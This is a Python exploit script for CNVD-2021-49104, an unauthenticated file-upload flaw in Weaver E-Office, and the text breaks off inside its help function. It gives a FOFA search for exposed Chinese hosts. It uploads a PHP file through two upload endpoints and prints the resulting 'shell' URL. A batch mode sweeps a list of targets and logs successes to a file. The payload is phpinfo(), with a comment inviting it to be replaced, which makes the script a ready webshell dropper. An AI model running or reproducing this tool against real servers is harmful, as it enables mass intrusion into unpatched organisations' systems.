#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
# Author: Noth
# Time: 2023-9-26
# fofa: app="泛微-EOffice" && country="CN"
# CNVD-2021-49104

import requests
import sys
import re

def theme_upload(url):
    uri2 = '/general/index/UploadFile.php?m=uploadPicture&uploadType=theme&userId=1'
    url_theme = url + uri2
    header = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763',
    }
    text1 = '''<?php phpinfo();?>
    '''  # 文件內容可自行更改
    file = {'Filedata': ('test.php', text1)}

    resp = requests.post(url=url_theme, headers=header, files=file, timeout=5)
    # resp_text = re.findall(r"{\"name\":\"(.+?php)",resp.text)
    resp_text = resp.text
    resp1_text = re.findall(r"{\"name\":\"(.+?php)", resp_text)
    # print(resp_text)
    resp_code = resp.status_code
    shell_url = url + '/images/themes/' + str(resp1_text[0])
    if resp_code == 200 and '{\"name\":' in resp_text:
        print(f'[+]theme上傳成功:{shell_url}')
    else:
        print('[-]theme上傳失敗，無法利用')

def upload(url):
    uri = '/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId='
    url_all = url + uri
    header = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763',
    }
    text1 = '''<?php phpinfo();?>
    '''  # 文件內容可自行更改
    file = {'Filedata': ('test.php', text1)}
    try:
        resp = requests.post(url=url_all, headers=header, files=file)
        resp_text = resp.text
        resp_code = resp.status_code
        shell_url = url + '/images/logo/' + resp_text
        if resp_code == 200 and 'logo-eoffice.php' in resp_text:
            print(f'[+]eoffice_logo上傳成功:{shell_url}')
        else:
            print('[-]eoffice_logo上傳失敗，嘗試新路徑上傳')
            url1 = url
            theme_upload(url1)
    except:
        print('[-]請求錯誤')

def upload_pl(files):
    uri = '/general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId='
    f = open(files)
    f1 = f.readlines()
    for url in f1:
        url = url.replace('\n', '')
        url_all = url + uri
        # print("測試路徑"+url_all)
        header = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763',
        }
        text1 = '''<?php phpinfo();?>
            '''  # 文件內容可自行更改
        file = {'Filedata': ('test.php', text1)}
        try:
            resp = requests.post(url=url_all, headers=header, files=file, timeout=5)
            resp_text = resp.text
            resp_code = resp.status_code
            shell_url = url + '/images/logo/' + resp_text
            if resp_code == 200 and 'logo-eoffice.php' in resp_text:
                print(f'[+]eoffice_logo上傳成功:{shell_url}')
                f_success = open('success.txt', 'a+')
                f_success.write(shell_url + '\n')
                f_success.close()
                continue
            else:
                print('[-]eoffice_logo上傳失敗，嘗試新路徑上傳')
                url1 = url
                theme_upload(url1)
        except:
            print('[-]請求路徑')

def help():
    print(' ')
    print('[+] python3 eoffice_fileupload -h 查看幫助')
    print('[+] python3 eoffice_fileupload -upload
